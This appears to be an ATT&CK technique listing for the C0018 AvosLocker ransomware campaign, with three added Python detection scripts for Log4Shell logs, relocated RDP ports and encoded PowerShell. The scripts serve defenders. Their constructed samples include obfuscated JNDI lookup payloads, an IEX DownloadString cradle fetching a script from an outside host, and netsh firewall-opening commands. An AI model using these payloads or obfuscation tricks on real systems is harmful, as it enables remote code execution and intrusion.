enterprise |
T1071 |
Application Layer Protocol |
- |
enterprise |
T1071.001 |
Web Protocols |
During C0018, the threat actors used HTTP for C2 communications. |
enterprise |
T1059 |
Command and Scripting Interpreter |
- |
enterprise |
T1059.001 |
PowerShell |
During C0018, the threat actors used encoded PowerShell scripts for execution. |
enterprise |
T1486 |
Data Encrypted for Impact |
During C0018, the threat actors used AvosLocker ransomware to encrypt files on the compromised network. |
enterprise |
T1190 |
Exploit Public-Facing Application |
During C0018, the threat actors exploited VMware Horizon Unified Access Gateways that were vulnerable to Log4Shell (CVE-2021-44228) and the related Apache Log4j 2 vulnerabilities CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832. |
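The Log4Shell exploitation above is usually hunted for in the web-tier access logs of the exposed gateway, and the main pitfall is that the `${jndi:...}` string is rarely sent in the clear: attackers URL-encode it and wrap it in nested Log4j lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) that the vulnerable library collapses before the JNDI lookup fires. The detector below is an added example, not part of the ATT&CK entry or of any vendor product; the access-log lines are constructed, and the normalizer models only the `:-` default and `lower`/`upper` lookups (other lookups are left in place), so it is a hunting aid rather than a full Log4j emulator.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from the C0018 reporting): a benign
# request, a plain JNDI lookup in the User-Agent, a URL-encoded nested lookup in
# the query string, and a fully fragmented lookup built from ${::-x} defaults.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2022:08:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2022:08:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [10/Mar/2022:08:00:03 +0000] "GET /portal/?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.7 - - [10/Mar/2022:08:00:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7:1389/a}" "Mozilla/5.0"',
]

# An innermost ${...} lookup: one whose body contains no further "$", "{" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

def resolve_lookup(body: str) -> str:
    """Evaluate one innermost Log4j 2 lookup the way the attacker relies on it.

    Only the forms used for obfuscation are modelled: ':-' defaults
    (${::-j}, ${env:NOPE:-j}, ${sys:x:-j}) and the lower/upper lookups.
    Any other lookup (including jndi itself) is left in place unchanged.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep:
        if kind.lower() == "lower":
            return arg.lower()
        if kind.lower() == "upper":
            return arg.upper()
    return "${" + body + "}"

def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested lookups inside-out until stable."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):  # bounded so hostile input cannot spin forever
        collapsed = INNER_LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text

# Match only after normalization; the raw line may never contain "jndi".
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\b", re.I)

def scan_line(line: str):
    """Return a finding dict for a line carrying a JNDI lookup, else None."""
    normalized = normalize(line)
    match = JNDI_LOOKUP.search(normalized)
    if not match:
        return None
    return {"raw": line, "normalized": normalized, "scheme": match.group(1).lower()}

def scan(lines):
    return [hit for hit in map(scan_line, lines) if hit is not None]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["scheme"], hit["normalized"])
```

Run it over a day of gateway access logs and the three hostile lines come back as `${jndi:ldap://203.0.113.7:1389/a}` regardless of how they were wrapped; a raw grep for `jndi` would have missed the last two. Match on the normalized text, keep the raw line for evidence, and treat any hit against a gateway that was unpatched at the time as a likely compromise rather than a blocked scan.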
enterprise |
T1105 |
Ingress Tool Transfer |
During C0018, the threat actors downloaded additional tools, such as Mimikatz and Sliver, as well as Cobalt Strike and AvosLocker ransomware onto the victim network. |
enterprise |
T1570 |
Lateral Tool Transfer |
During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy. |
enterprise |
T1036 |
Masquerading |
During C0018, AvosLocker was disguised using the victim company name as the filename. |
enterprise |
T1036.005 |
Match Legitimate Name or Location |
For C0018, the threat actors renamed a Sliver payload to vmware_kb.exe. |
enterprise |
T1046 |
Network Service Discovery |
During C0018, the threat actors used the SoftPerfect Network Scanner for network scanning. |
enterprise |
T1571 |
Non-Standard Port |
During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections. |
enterprise |
T1027 |
Obfuscated Files or Information |
- |
enterprise |
T1027.010 |
Command Obfuscation |
During C0018, the threat actors used Base64 to encode their PowerShell scripts. |
enterprise |
T1588 |
Obtain Capabilities |
- |
enterprise |
T1588.002 |
Tool |
For C0018, the threat actors acquired a variety of publicly available tools, including the open source Mimikatz and Sliver and the commercial/freeware SoftPerfect Network Scanner, AnyDesk, and PDQ Deploy. |
enterprise |
T1219 |
Remote Access Software |
During C0018, the threat actors used AnyDesk to transfer tools between systems. |
enterprise |
T1021 |
Remote Services |
- |
enterprise |
T1021.001 |
Remote Desktop Protocol |
During C0018, the threat actors opened a variety of ports to establish RDP connections, including ports 28035, 32467, 41578, and 46892. |
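Moving the RDP listener to ports such as 28035 or 46892 (the Non-Standard Port and Remote Desktop Protocol rows above) leaves two host artifacts: the RDP-Tcp PortNumber registry value is rewritten, and a firewall rule is typically added for the new port. The triage below is an added example, not part of the ATT&CK entry; it runs over constructed Sysmon-style records (EventID 13 registry set, EventID 1 process creation), assumes a hypothetical allowlist of inbound ports the environment expects, and grades a firewall opening as high severity only when it matches a relocated RDP listener.

```python
import re

# Registry value that sets the RDP listener port (default 3389).
RDP_PORT_VALUE = (r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
                  r"\WinStations\RDP-Tcp\PortNumber")

# Inbound TCP ports this (hypothetical) environment expects admins to open.
EXPECTED_INBOUND = {80, 443, 3389}

# Constructed telemetry (not from the C0018 reporting). Field names follow Sysmon:
# EventID 13 = registry value set, EventID 1 = process creation.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": RDP_PORT_VALUE, "Details": "DWORD (0x00006d83)"},   # 0x6d83 = 28035
    {"EventID": 1, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="Remote Desktop" '
                    'dir=in action=allow protocol=TCP localport=28035'},
    {"EventID": 1, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="Web" dir=in '
                    'action=allow protocol=TCP localport=443'},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\EnableICMPRedirect",
     "Details": "DWORD (0x00000000)"},
]

DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")
FW_PORT_RE = re.compile(r"(?i)\badvfirewall\b.*\badd\s+rule\b.*\blocalport=(\d{1,5})\b")

def parse_dword(details: str):
    """Sysmon renders DWORD values as 'DWORD (0x00006d83)'; return the int or None."""
    m = DWORD_RE.fullmatch(details.strip())
    return int(m.group(1), 16) if m else None

def firewall_port(cmdline: str):
    """Port opened by 'netsh advfirewall firewall add rule ... localport=N', else None."""
    m = FW_PORT_RE.search(cmdline)
    return int(m.group(1)) if m else None

def analyze(events):
    """Pass 1 collects RDP listener port changes; pass 2 grades firewall openings."""
    findings, rdp_ports = [], set()
    for ev in events:
        if ev.get("EventID") == 13 and ev.get("TargetObject", "").lower() == RDP_PORT_VALUE.lower():
            port = parse_dword(ev.get("Details", ""))
            if port is not None and port != 3389:
                rdp_ports.add(port)
                findings.append({"rule": "rdp_listener_port_changed", "port": port,
                                 "severity": "high", "image": ev.get("Image")})
    for ev in events:
        if ev.get("EventID") == 1 and ev.get("Image", "").lower().endswith("\\netsh.exe"):
            port = firewall_port(ev.get("CommandLine", ""))
            if port is None or port in EXPECTED_INBOUND:
                continue
            # A firewall opening that matches a relocated RDP listener is the
            # pattern in the table; any other unexpected port is medium severity.
            severity = "high" if port in rdp_ports else "medium"
            findings.append({"rule": "firewall_opened_unexpected_port", "port": port,
                             "severity": severity, "image": ev.get("Image")})
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The registry write is the stronger signal because it survives whatever tool made it (regedit, reg.exe, PowerShell, or a GUI), while the netsh rule only catches one way of opening the port; correlate both with network telemetry showing TCP sessions to the same high port, since the RDP handshake itself is what the table describes.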
enterprise |
T1072 |
Software Deployment Tools |
During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network. |
enterprise |
T1218 |
System Binary Proxy Execution |
- |
enterprise |
T1218.011 |
Rundll32 |
During C0018, the threat actors used rundll32 to run Mimikatz. |
enterprise |
T1016 |
System Network Configuration Discovery |
During C0018, the threat actors ran nslookup and Advanced IP Scanner on the target network. |
enterprise |
T1033 |
System Owner/User Discovery |
During C0018, the threat actors collected whoami information via PowerShell scripts. |
enterprise |
T1047 |
Windows Management Instrumentation |
During C0018, the threat actors used WMIC to modify administrative settings on both a local and a remote host, likely as a first stage of their lateral movement. They also used the WMI Provider Host (wmiprvse.exe) to execute a variety of Base64-encoded PowerShell scripts that used the DownloadString method. |
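The encoded PowerShell thread runs through several rows of this table: Base64-encoded scripts for execution (PowerShell), Base64 as the obfuscation (Command Obfuscation), whoami collected from those scripts (System Owner/User Discovery), and wmiprvse.exe launching scripts that call DownloadString (Windows Management Instrumentation). The triage below is an added example, not part of the ATT&CK entry; it decodes the `-EncodedCommand` argument (Base64 of UTF-16LE text, any unambiguous prefix of the switch accepted by powershell.exe), scores the decoded text for download cradles, Invoke-Expression and user discovery, and flags a WMI Provider Host parent. The scripts and process-creation events are constructed, and the indicator list is an assumption to be tuned per environment.

```python
import base64
import re

def encode_command(script: str) -> str:
    """What powershell.exe expects after -EncodedCommand: Base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed scripts and process-creation events (not from the C0018 reporting).
MALICIOUS_SCRIPT = ("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1'); "
                    "whoami /all")
BENIGN_SCRIPT = r"Get-Date | Out-File C:\temp\ts.txt"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "Image": POWERSHELL,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(MALICIOUS_SCRIPT)},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": "powershell.exe -EncodedCommand " + encode_command(BENIGN_SCRIPT)},
]

# A switch followed by a Base64 run; the switch is checked against -EncodedCommand below.
FLAG_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{16,})")

# Assumed indicator set; extend with whatever your environment never runs legitimately.
INDICATORS = {
    "download_cradle": re.compile(r"(?i)\.(DownloadString|DownloadFile|DownloadData)\s*\(|Invoke-WebRequest|\biwr\b"),
    "invoke_expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "user_discovery": re.compile(r"(?i)\bwhoami\b|\$env:USERNAME|\[Environment\]::UserName"),
}

def extract_encoded(cmdline: str):
    """Return the Base64 blob passed to -e/-ec/-enc/.../-EncodedCommand, or None."""
    for flag, blob in FLAG_RE.findall(cmdline):
        if "encodedcommand".startswith(flag.lower()):
            return blob
    return None

def decode_command(blob: str):
    """Reverse encode_command; None if the blob is not valid Base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event: dict) -> dict:
    """Decode, score and attribute one PowerShell process-creation event."""
    result = {"encoded": False, "decoded": None, "indicators": [], "parent_wmi": False}
    result["parent_wmi"] = event.get("ParentImage", "").lower().endswith("\\wmiprvse.exe")
    blob = extract_encoded(event.get("CommandLine", ""))
    if blob is not None:
        result["encoded"] = True
        result["decoded"] = decode_command(blob)
    # Score the decoded script when there is one, otherwise the raw command line.
    text = result["decoded"] or event.get("CommandLine", "")
    result["indicators"] = [name for name, rx in INDICATORS.items() if rx.search(text)]
    result["suspicious"] = result["parent_wmi"] or bool(result["indicators"])
    return result

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = triage(ev)
        print(r["suspicious"], r["parent_wmi"], r["indicators"], r["decoded"])
```

Encoding alone is not the signal (plenty of management tooling uses `-EncodedCommand`, as the benign event shows); the decoded content and the parent are. A PowerShell child of wmiprvse.exe pulling a script with DownloadString and then running whoami is the sequence this table records, and Script Block Logging (Event ID 4104) will show the same decoded text server-side if it is enabled.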